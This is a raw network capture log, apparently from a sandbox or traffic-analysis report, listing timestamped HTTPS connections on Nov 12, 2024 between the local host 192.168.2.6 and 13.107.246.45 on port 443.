                                                        Nov 12, 2024 16:27:51.172735929 CET4434996413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:51.908268929 CET4434996213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:51.909087896 CET49962443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:51.909148932 CET4434996213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:51.910013914 CET49962443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:51.910022020 CET4434996213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:51.917414904 CET4434996313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:51.920151949 CET4434996413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:51.920473099 CET49963443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:51.920499086 CET4434996313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:51.921339035 CET49963443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:51.921344995 CET4434996313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:51.921876907 CET49964443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:51.921895981 CET4434996413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:51.922472000 CET49964443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:51.922477007 CET4434996413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:52.038804054 CET4434996213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:52.038862944 CET4434996213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:52.038908005 CET49962443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:52.055412054 CET4434996313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:52.055430889 CET4434996313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:52.055470943 CET4434996313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:52.055486917 CET49963443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:52.055526018 CET49963443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:52.057874918 CET4434996413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:52.057929039 CET4434996413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:52.057982922 CET49964443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:52.164746046 CET49962443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:52.164772034 CET4434996213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:52.234317064 CET49963443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:52.234347105 CET4434996313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:52.234361887 CET49963443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:52.234369993 CET4434996313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:52.252027035 CET49964443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:52.252041101 CET4434996413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:52.252053022 CET49964443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:52.252059937 CET4434996413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:52.414144993 CET49965443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:52.414186001 CET4434996513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:52.414249897 CET49965443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:52.415601015 CET49965443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:52.415617943 CET4434996513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:52.418972015 CET49966443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:52.419004917 CET4434996613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:52.419089079 CET49966443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:52.419259071 CET49966443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:52.419272900 CET4434996613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:52.422849894 CET49967443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:52.422868013 CET4434996713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:52.423103094 CET49967443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:52.423226118 CET49967443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:52.423237085 CET4434996713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:53.159507990 CET4434996513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:53.160938025 CET49965443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:53.160955906 CET4434996513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:53.162427902 CET49965443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:53.162432909 CET4434996513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:53.168015957 CET4434996613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:53.168723106 CET49966443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:53.168767929 CET4434996613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:53.169589996 CET49966443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:53.169605970 CET4434996613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:53.195080042 CET4434996713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:53.195771933 CET49967443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:53.195780039 CET4434996713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:53.196634054 CET49967443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:53.196638107 CET4434996713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:53.293124914 CET4434996513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:53.293415070 CET4434996513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:53.293529034 CET49965443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:53.293958902 CET49965443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:53.293982983 CET4434996513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:53.293997049 CET49965443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:53.294003010 CET4434996513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:53.303869963 CET49969443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:53.303922892 CET4434996913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:53.303986073 CET49969443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:53.304503918 CET49969443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:53.304517984 CET4434996913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:53.323631048 CET4434996613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:53.323704958 CET4434996613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:53.323771000 CET49966443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:53.323882103 CET49966443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:53.323904037 CET4434996613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:53.323918104 CET49966443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:53.323924065 CET4434996613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:53.331667900 CET49970443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:53.331707001 CET4434997013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:53.331770897 CET49970443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:53.332506895 CET49970443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:53.332520008 CET4434997013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:53.356385946 CET4434996713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:53.356558084 CET4434996713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:53.356601954 CET49967443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:53.356616974 CET4434996713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:53.356631041 CET4434996713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:53.356676102 CET49967443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:53.357295036 CET49967443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:53.357311964 CET4434996713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:53.357321024 CET49967443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:53.357326031 CET4434996713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:53.366961956 CET49971443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:53.367022991 CET4434997113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:53.367089987 CET49971443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:53.367681980 CET49971443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:53.367698908 CET4434997113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:53.480037928 CET49906443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:53.488826036 CET49972443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:53.488882065 CET4434997213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:53.488941908 CET49972443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:53.490582943 CET49972443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:53.490600109 CET4434997213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:54.024949074 CET4434996913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:54.026046038 CET49969443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:54.026071072 CET4434996913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:54.028152943 CET49969443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:54.028161049 CET4434996913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:54.102531910 CET4434997013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:54.103142977 CET49970443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:54.103168011 CET4434997013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:54.103672981 CET49970443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:54.103687048 CET4434997013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:54.105961084 CET4434997113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:54.106375933 CET49971443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:54.106410980 CET4434997113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:54.106862068 CET49971443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:54.106868029 CET4434997113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:54.157098055 CET4434996913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:54.157510042 CET4434996913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:54.157632113 CET49969443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:54.157679081 CET49969443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:54.157679081 CET49969443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:54.157702923 CET4434996913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:54.157713890 CET4434996913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:54.160401106 CET49973443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:54.160445929 CET4434997313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:54.160592079 CET49973443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:54.160841942 CET49973443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:54.160854101 CET4434997313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:54.238632917 CET4434997113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:54.238765955 CET4434997113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:54.238848925 CET4434997113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:54.238876104 CET49971443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:54.239048958 CET49971443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:54.239048958 CET49971443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:54.239131927 CET49971443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:54.239146948 CET4434997113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:54.240117073 CET4434997013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:54.240478992 CET4434997013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:54.241518021 CET4434997213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:54.241761923 CET49970443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:54.242181063 CET49972443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:54.242197037 CET4434997213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:54.242225885 CET49974443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:54.242228031 CET49970443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:54.242252111 CET4434997013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:54.242253065 CET4434997413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:54.242331028 CET49970443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:54.242332935 CET49974443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:54.242341995 CET4434997013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:54.242773056 CET49972443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:54.242784023 CET4434997213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:54.244153023 CET49974443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:54.244160891 CET4434997413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:54.244906902 CET49975443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:54.244930983 CET4434997513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:54.245101929 CET49975443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:54.245132923 CET49975443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:54.245141983 CET4434997513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:54.829951048 CET4434997213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:54.830327034 CET4434997213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:54.830384016 CET49972443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:54.830420017 CET49972443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:54.830436945 CET4434997213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:54.830446005 CET49972443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:54.830451965 CET4434997213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:54.833863020 CET49976443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:54.833925962 CET4434997613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:54.834000111 CET49976443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:54.834196091 CET49976443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:54.834208012 CET4434997613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:54.907438040 CET4434997313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:54.907938957 CET49973443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:54.907968044 CET4434997313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:54.908421993 CET49973443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:54.908427000 CET4434997313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:54.975661039 CET4434997413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:54.976250887 CET49974443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:54.976262093 CET4434997413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:54.976672888 CET49974443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:54.976676941 CET4434997413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:54.983912945 CET4434997513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:54.984268904 CET49975443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:54.984304905 CET4434997513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:54.984730959 CET49975443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:54.984739065 CET4434997513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:55.038876057 CET4434997313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:55.039051056 CET4434997313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:55.039098978 CET49973443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:55.039099932 CET4434997313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:55.039161921 CET49973443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:55.039305925 CET49973443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:55.039330006 CET4434997313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:55.039355040 CET49973443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:55.039361954 CET4434997313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:55.042644024 CET49977443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:55.042680979 CET4434997713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:55.042758942 CET49977443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:55.042977095 CET49977443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:55.042988062 CET4434997713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:55.105130911 CET4434997413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:55.105195045 CET4434997413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:55.105242968 CET49974443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:55.105720043 CET49974443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:55.105741978 CET4434997413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:55.105978966 CET49974443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:55.105984926 CET4434997413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:55.113570929 CET4434997513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:55.113718033 CET49978443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:55.113760948 CET4434997813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:55.113823891 CET49978443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:55.113976955 CET49978443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:55.113987923 CET4434997813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:55.114069939 CET4434997513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:55.114113092 CET4434997513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:55.114114046 CET49975443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:55.114157915 CET49975443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:55.114180088 CET49975443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:55.114185095 CET4434997513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:55.114197016 CET49975443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:55.114201069 CET4434997513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:55.116600037 CET49979443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:55.116616011 CET4434997913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:55.116673946 CET49979443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:55.116847038 CET49979443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:55.116857052 CET4434997913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:55.557657957 CET4434997613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:55.558278084 CET49976443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:55.558305979 CET4434997613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:55.558909893 CET49976443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:55.558914900 CET4434997613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:55.694546938 CET4434997613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:55.694613934 CET4434997613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:55.694870949 CET49976443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:55.695003986 CET49976443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:55.695003986 CET49976443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:55.695031881 CET4434997613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:55.695046902 CET4434997613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:55.699536085 CET49980443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:55.699594975 CET4434998013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:55.699732065 CET49980443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:55.700151920 CET49980443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:55.700169086 CET4434998013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:55.786197901 CET4434997713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:55.787267923 CET49977443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:55.787269115 CET49977443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:55.787293911 CET4434997713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:55.787317038 CET4434997713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:55.870069981 CET4434997813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:55.871257067 CET49978443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:55.871257067 CET49978443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:55.871290922 CET4434997813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:55.871318102 CET4434997813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:55.872251034 CET4434997913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:55.873004913 CET49979443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:55.873006105 CET49979443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:55.873034954 CET4434997913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:55.873049974 CET4434997913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:55.926074982 CET4434997713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:55.926148891 CET4434997713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:55.926503897 CET49977443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:55.926568031 CET49977443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:55.926568031 CET49977443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:55.926584959 CET4434997713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:55.926592112 CET4434997713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:55.929599047 CET49981443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:55.929639101 CET4434998113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:55.929900885 CET49981443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:55.929900885 CET49981443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:55.929930925 CET4434998113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:56.000340939 CET4434997813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:56.000678062 CET4434997813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:56.000808001 CET49978443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:56.000844955 CET49978443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:56.000844955 CET49978443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:56.000863075 CET4434997813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:56.000871897 CET4434997813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:56.003731012 CET49982443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:56.003776073 CET4434998213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:56.003983974 CET49982443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:56.004097939 CET49982443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:56.004110098 CET4434998213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:56.005429029 CET4434997913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:56.005574942 CET4434997913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:56.005619049 CET4434997913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:56.005651951 CET49979443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:56.005724907 CET49979443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:56.005724907 CET49979443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:56.005740881 CET49979443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:56.005754948 CET4434997913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:56.007873058 CET49983443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:56.007910013 CET4434998313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:56.008125067 CET49983443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:56.008208036 CET49983443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:56.008222103 CET4434998313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:56.448662043 CET4434998013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:56.449395895 CET49980443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:56.449440002 CET4434998013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:56.450038910 CET49980443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:56.450052977 CET4434998013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:56.583209991 CET4434998013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:56.583446980 CET4434998013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:56.583662033 CET49980443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:56.583699942 CET49980443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:56.583699942 CET49980443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:56.583717108 CET4434998013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:56.583725929 CET4434998013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:56.586714029 CET49984443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:56.586750984 CET4434998413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:56.586870909 CET49984443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:56.587053061 CET49984443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:56.587069035 CET4434998413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:56.671088934 CET4434998113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:56.671665907 CET49981443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:56.671700001 CET4434998113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:56.672122002 CET49981443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:56.672127008 CET4434998113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:56.759077072 CET4434998213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:56.759798050 CET49982443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:56.759820938 CET4434998213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:56.760394096 CET49982443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:56.760397911 CET4434998213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:56.804425001 CET4434998113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:56.805191994 CET4434998113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:56.805250883 CET49981443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:56.805304050 CET49981443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:56.805320024 CET4434998113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:56.805329084 CET49981443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:56.805335045 CET4434998113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:56.808393002 CET49985443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:56.808420897 CET4434998513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:56.808612108 CET49985443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:56.808810949 CET49985443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:56.808830023 CET4434998513.107.246.45192.168.2.6
